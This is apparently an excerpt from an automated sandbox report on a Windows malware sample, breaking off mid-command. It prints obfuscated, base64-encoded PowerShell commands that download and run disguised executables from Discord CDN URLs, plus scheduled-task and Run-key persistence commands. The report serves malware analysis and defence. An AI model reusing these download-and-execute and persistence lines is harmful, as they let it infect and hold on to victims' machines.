cmdline	powershell -EncodedCommand "PAAjAGIAaQB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA2ADEAMwA4ADEANgA5ADgAMwA2ADQAMgAvAFIAZQBkAGwAaQBuAEUAUwBlAGMAdQByAHQAeQAuAGUAeABlACcALAAgADwAIwByAGwAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHUAbQBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAdgB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFIAZQBkAGwAaQBuAEUAUwBlAGMAdQByAHQAeQAuAGUAeABlACcAKQApADwAIwBjAGsAbAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGQAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZABzAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUgBlAGQAbABpAG4ARQBTAGUAYwB1AHIAdAB5AC4AZQB4AGUAJwApADwAIwBmAHUAcgAjAD4A"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZwBjACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgAxADUANgAwADIAOQA2ADYAMQAyADgANAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAdQByAHYAaQBjAGUALgBlAHgAZQAnACwAIAA8ACMAdABjAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB3AHMAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBmAHMAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcAKQApADwAIwBnAHAAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBlAHIAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeAB5AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnACkAPAAjAHkAcgBsACMAPgA="
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAagB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAAyADcAMQA5ADUAMgA5ADIAOAA4ADMAMwA3ADAAMAAzADQALwAxADAAMwAwADgAOAA3ADEAOAA5ADYAMAAyADYANQAyADIAMgAxAC8ARgBpAGwAZQBNAGEAbgBhAGcAZQAuAGUAeABlACcALAAgADwAIwBpAG4AcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAYwBwACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAcABnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEYAaQBsAGUATQBhAG4AYQBnAGUALgBlAHgAZQAnACkAKQA8ACMAdwB6AG0AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBkAGMAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHUAeQBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEYAaQBsAGUATQBhAG4AYQBnAGUALgBlAHgAZQAnACkAPAAjAGsAdwBqACMAPgA="
cmdline	"cmd" /C schtasks /create /tn \WIndowShellHost /tr "C:\Users\test22\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAaQB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA2ADEAMwA4ADEANgA5ADgAMwA2ADQAMgAvAFIAZQBkAGwAaQBuAEUAUwBlAGMAdQByAHQAeQAuAGUAeABlACcALAAgADwAIwByAGwAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHUAbQBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAdgB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFIAZQBkAGwAaQBuAEUAUwBlAGMAdQByAHQAeQAuAGUAeABlACcAKQApADwAIwBjAGsAbAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGQAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZABzAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUgBlAGQAbABpAG4ARQBTAGUAYwB1AHIAdAB5AC4AZQB4AGUAJwApADwAIwBmAHUAcgAjAD4A"
cmdline	powershell -EncodedCommand "PAAjAGQAagB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAAyADcAMQA5ADUAMgA5ADIAOAA4ADMAMwA3ADAAMAAzADQALwAxADAAMwAwADgAOAA3ADEAOAA5ADYAMAAyADYANQAyADIAMgAxAC8ARgBpAGwAZQBNAGEAbgBhAGcAZQAuAGUAeABlACcALAAgADwAIwBpAG4AcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAYwBwACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAcABnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEYAaQBsAGUATQBhAG4AYQBnAGUALgBlAHgAZQAnACkAKQA8ACMAdwB6AG0AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBkAGMAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHUAeQBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEYAaQBsAGUATQBhAG4AYQBnAGUALgBlAHgAZQAnACkAPAAjAGsAdwBqACMAPgA="
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYQBxACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA2ADYANgA2ADUANgA4ADEAMwAxADgANgAvAFIAZQBkAGwAaQBuAEUAUwBlAGMAdQByAGkAdAB5AC4AZQB4AGUAJwAsACAAPAAjAHcAagBwACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZQBoAGsAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBzAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUgBlAGQAbABpAG4ARQBTAGUAYwB1AHIAaQB0AHkALgBlAHgAZQAnACkAKQA8ACMAdAB1AHEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABnAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGgAcwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFIAZQBkAGwAaQBuAEUAUwBlAGMAdQByAGkAdAB5AC4AZQB4AGUAJwApADwAIwB1AGIAYwAjAD4A"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AYgB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADEAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAAyADcAMQA5ADUAMgA5ADIAOAA4ADMAMwA3ADAAMAAzADQALwAxADAAMwAwADgAOAA3ADQAOAAwADYANAA1ADMAOAA2ADMANgAxAC8AVwBpAG4AZABvAHcAcwBQAHIAbwB0AGUAYwB0AC4AZQB4AGUAJwAsACAAPAAjAGcAawBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdQBiAHYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBzAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAG4AZABvAHcAcwBQAHIAbwB0AGUAYwB0AC4AZQB4AGUAJwApACkAPAAjAGIAYwBzACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHEAdQBrACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB5AGsAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkAbgBkAG8AdwBzAFAAcgBvAHQAZQBjAHQALgBlAHgAZQAnACkAPAAjAGwAbgBlACMAPgA="
cmdline	"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WIndowShellHost';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WIndowShellHost' -Value '"C:\Users\test22\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe"' -PropertyType 'String'
cmdline	powershell -EncodedCommand "PAAjAHgAZwBjACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgAxADUANgAwADIAOQA2ADYAMQAyADgANAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAdQByAHYAaQBjAGUALgBlAHgAZQAnACwAIAA8ACMAdABjAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB3AHMAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBmAHMAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcAKQApADwAIwBnAHAAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBlAHIAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeAB5AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnACkAPAAjAHkAcgBsACMAPgA="
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAbABiACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgAxADkAMgAxADUAOQA0ADAAOAAxADcAMAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAdQByAHYAaQBjAC4AZQB4AGUAJwAsACAAPAAjAGMAdwBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaAB4AGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBlAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAC4AZQB4AGUAJwApACkAPAAjAHoAaQBzACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAG0AaQBwACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBlAGoAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMALgBlAHgAZQAnACkAPAAjAHkAeABsACMAPgA="
cmdline	powershell -EncodedCommand "PAAjAHgAYQBxACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA2ADYANgA2ADUANgA4ADEAMwAxADgANgAvAFIAZQBkAGwAaQBuAEUAUwBlAGMAdQByAGkAdAB5AC4AZQB4AGUAJwAsACAAPAAjAHcAagBwACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZQBoAGsAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBzAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUgBlAGQAbABpAG4ARQBTAGUAYwB1AHIAaQB0AHkALgBlAHgAZQAnACkAKQA8ACMAdAB1AHEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABnAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGgAcwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFIAZQBkAGwAaQBuAEUAUwBlAGMAdQByAGkAdAB5AC4AZQB4AGUAJwApADwAIwB1AGIAYwAjAD4A"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAdQBuACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANQA4ADkAOAA4ADcAMgA2ADgAOAA2ADgAMAAvAEQAZQBmAGUAbgBkAGUAcgBSAHUAbgB0AGkAbQBlAC4AZQB4AGUAJwAsACAAPAAjAGUAcgBlACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZgBhAGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZwB4AGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcARABlAGYAZQBuAGQAZQByAFIAdQBuAHQAaQBtAGUALgBlAHgAZQAnACkAKQA8ACMAbQBqAGsAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeAB0AGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGMAagBjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEQAZQBmAGUAbgBkAGUAcgBSAHUAbgB0AGkAbQBlAC4AZQB4AGUAJwApADwAIwB0AGcAeAAjAD4A"
cmdline	powershell -EncodedCommand "PAAjAHYAdQBuACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANQA4ADkAOAA4ADcAMgA2ADgAOAA2ADgAMAAvAEQAZQBmAGUAbgBkAGUAcgBSAHUAbgB0AGkAbQBlAC4AZQB4AGUAJwAsACAAPAAjAGUAcgBlACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZgBhAGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZwB4AGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcARABlAGYAZQBuAGQAZQByAFIAdQBuAHQAaQBtAGUALgBlAHgAZQAnACkAKQA8ACMAbQBqAGsAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeAB0AGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGMAagBjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEQAZQBmAGUAbgBkAGUAcgBSAHUAbgB0AGkAbQBlAC4AZQB4AGUAJwApADwAIwB0AGcAeAAjAD4A"

Drops a binary and executes it (13 events)

file	C:\Users\test22\AppData\Roaming\HYPERVISOR.SLN
file	C:\Users\test22\AppData\Roaming\DEFENDERRUNTIME.EXE
file	C:\Users\test22\AppData\Roaming\DEFENDERRUNTIMEE.EXE
file	C:\Users\test22\AppData\Roaming\FILEMANAGE.EXE
file	C:\Users\test22\AppData\Roaming\FILEMANAGER.EXE
file	C:\Users\test22\AppData\Roaming\REDLINESECURITY.EXE
file	C:\Users\test22\AppData\Roaming\REDLINESECURTY.EXE
file	C:\Users\test22\AppData\Roaming\S500UBNAN.EXE
file	C:\Users\test22\AppData\Roaming\SECURITYHEALTHSERVICE.EXE
file	C:\Users\test22\AppData\Roaming\SECURITYHEALTHSEURVIC.EXE
file	C:\Users\test22\AppData\Roaming\SECURITYHOST.EXE
file	C:\Users\test22\AppData\Roaming\WINDOWSDEFENDERSMART.EXE
file	C:\Users\test22\AppData\Roaming\WINDOWSPROTECT.EXE

Drops an executable to the user AppData folder (13 events)

file	C:\Users\test22\AppData\Roaming\SECURITYHEALTHSERVICE.EXE
file	C:\Users\test22\AppData\Roaming\FILEMANAGE.EXE
file	C:\Users\test22\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe
file	C:\Users\test22\AppData\Roaming\SECURITYHEALTHSEURVIC.EXE
file	C:\Users\test22\AppData\Roaming\FILEMANAGER.EXE
file	C:\Users\test22\AppData\Roaming\WINDOWSPROTECT.EXE
file	C:\Users\test22\AppData\Roaming\DEFENDERRUNTIMEE.EXE
file	C:\Users\test22\AppData\Roaming\WINDOWSDEFENDERSMART.EXE
file	C:\Users\test22\AppData\Roaming\REDLINESECURITY.EXE
file	C:\Users\test22\AppData\Roaming\S500UBNAN.EXE
file	C:\Users\test22\AppData\Roaming\REDLINESECURTY.EXE
file	C:\Users\test22\AppData\Roaming\DEFENDERRUNTIME.EXE
file	C:\Users\test22\AppData\Roaming\SECURITYHOST.EXE

A process created a hidden window (14 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Nov. 8, 2022, 9:35 a.m.	thread_identifier: 2888 thread_handle: 0x00000218 process_identifier: 2884 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WIndowShellHost';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WIndowShellHost' -Value '"C:\Users\test22\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe"' -PropertyType 'String' filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000210	1	1
CreateProcessInternalW Nov. 8, 2022, 9:35 a.m.	thread_identifier: 2936 thread_handle: 0x00000220 process_identifier: 2932 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd" /C schtasks /create /tn \WIndowShellHost /tr "C:\Users\test22\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000230	1	1
ShellExecuteExW Nov. 8, 2022, 9:36 a.m.	show_type: 0 filepath_r: powershell parameters: -EncodedCommand "PAAjAHYAdQBuACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANQA4ADkAOAA4ADcAMgA2ADgAOAA2ADgAMAAvAEQAZQBmAGUAbgBkAGUAcgBSAHUAbgB0AGkAbQBlAC4AZQB4AGUAJwAsACAAPAAjAGUAcgBlACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZgBhAGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZwB4AGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcARABlAGYAZQBuAGQAZQByAFIAdQBuAHQAaQBtAGUALgBlAHgAZQAnACkAKQA8ACMAbQBqAGsAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeAB0AGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuA